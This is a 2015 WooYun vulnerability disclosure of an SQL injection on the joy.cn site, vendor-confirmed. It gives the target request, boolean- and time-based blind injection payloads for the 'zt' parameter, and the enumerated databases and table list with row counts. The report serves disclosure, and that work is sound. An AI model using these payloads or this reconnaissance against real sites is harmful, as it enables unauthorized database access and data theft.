当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122648

漏洞标题:激动网主站存在SQL注射漏洞

相关厂商:激动网

漏洞作者: 路人甲

提交时间:2015-06-25 11:28

修复时间:2015-08-09 11:38

公开时间:2015-08-09 11:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

RT

详细说明:

POST /special-page.jsp?zt=1 HTTP/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.joy.cn/
Cookie: JSESSIONID=02DB3555D41D5B8EF0C67471ABD70DB5
Host: www.joy.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
pageNum=1&saction=search

漏洞证明:

---
Parameter: zt (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: zt=-2879' OR 2165=2165 AND 'AUrp'='AUrp
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: zt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))soje) AND 'KTia'='KTia
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
available databases [4]:
[*] information_schema
[*] test
[*] wapcms
[*] waptranscode
Database: wapcms
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| reader_statistics_data | 12456775 |
| reader_voteresult_data | 10085592 |
| reader_system_log | 5855412 |
| reader_inter_vote_subitem | 2567636 |
| reader_resource_video_suite | 2087161 |
| reader_order_user_house | 1972867 |
| statistics_url_hour_data_report | 1765332 |
| reader_resource_p_res_info | 1004886 |
| statistics_url_data_report | 961519 |
| reader_resource_all | 230662 |
| reader_resource_video | 221989 |
| reader_inter_msgrecord | 192016 |
| reader_resource_restype | 165123 |
| statistics_ip_report | 145163 |
| reader_video_targetfile_status | 90159 |
| reader_statistics_url_config_auth | 75085 |
| reader_video_hot_comment | 53641 |
| reader_bussiness_column | 48737 |
| temp_dxn_type | 37545 |
| temp_dxn_file | 37450 |
| temp_dxn_resource | 31594 |
| reader_resource_material | 29651 |
| wo_push | 28767 |
| reader_inter_msglog | 28073 |
| wo_video | 21750 |
| reader_video_task_targetfile | 18328 |
| reader_ios_token | 17283 |
| reader_system_ipinfo_20111207 | 11836 |
| reader_bussiness_template | 9550 |
| reader_resource_info | 8700 |
| reader_inter_vote_item | 5177 |
| reader_resource_pack_fee | 4339 |
| reader_system_keyword | 3914 |
| reader_video_task_file | 3842 |
| reader_push_message | 2462 |
| temp_dxn_suite | 2298 |
| reader_statistics_url_config | 1989 |
| reader_resource_author | 1772 |
| ugc_user | 1489 |
| reader_comment_user | 1447 |
| rank_third | 1260 |
| reader_inter_vote | 1245 |
| reader_offline_log | 1175 |
| reader_system_ipinfo20110416 | 1069 |
| reader_system_ipinfo20100723 | 890 |
| reader_user_points_record | 770 |
| temp_dxn_suite1 | 766 |
| reader_resource_type | 740 |
| reader_video_task | 657 |
| reader_system_roles_privileges | 596 |
| media | 588 |
| reader_tag_template | 478 |
| statistics_url_config_group_rel | 430 |
| reader_statistics_access_log | 419 |
| reader_adapter_comadapterrule | 400 |
| reader_system_users_groups | 324 |
| reader_tag_userdef | 281 |
| reader_system_ipinfo | 256 |
| reader_adapter_adapterrule | 244 |
| reader_adapter_adapter | 221 |
| video_news | 182 |
| reader_system_users_roles | 139 |
| reader_useragent_ua | 133 |
| reader_system_variables | 117 |
| reader_tag_sys | 117 |
| reader_bussiness_packgroup | 102 |
| reader_useragent_ua_g_u | 102 |
| reader_system_user | 101 |
| reader_system_privilege | 90 |
| reader_system_menu | 79 |
| reader_resource_material_cata | 62 |
| statplaytop | 60 |
| reader_resource_ebook_chapter | 50 |
| reader_activity_join_record | 45 |
| pic_news | 32 |
| reader_ad_info | 26 |
| reader_system_role | 18 |
| reader_bussiness_tem_catalog | 17 |
| reader_activity_videos | 15 |
| reader_useragent_ua_group | 15 |
| statistics_url_config_group | 15 |
| reader_statistics_data_report | 11 |
| reader_system_group | 11 |
| reader_bussiness_tem_default | 10 |
| reader_inter_msgboard | 8 |
| user_info | 8 |
| reader_adapter_type | 7 |
| reader_bussiness_tem_type | 6 |
| reader_actiivty_award_user | 5 |
| reader_statistics_channel | 5 |
| reader_activity | 4 |
| reader_focus_pic | 4 |
| special_mgr | 4 |
| reader_partner_channel_child | 3 |
| reader_resource_ebook_tome | 3 |
| reader_resource_referen | 2 |
| reader_video_transcode_server | 2 |
| reader_bussiness_pg_area | 1 |
| reader_bussiness_product | 1 |
| reader_fee_fee | 1 |
| reader_partner_channel | 1 |
| reader_partner_spcp | 1 |
| reader_system_keyword_type | 1 |
| reader_video_cover | 1 |
| reader_vote_item_custom | 1 |
+-----------------------------------+---------+

修复方案:

修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-25 11:36

厂商回复:

谢谢!

最新状态:

暂无


漏洞评价:

评论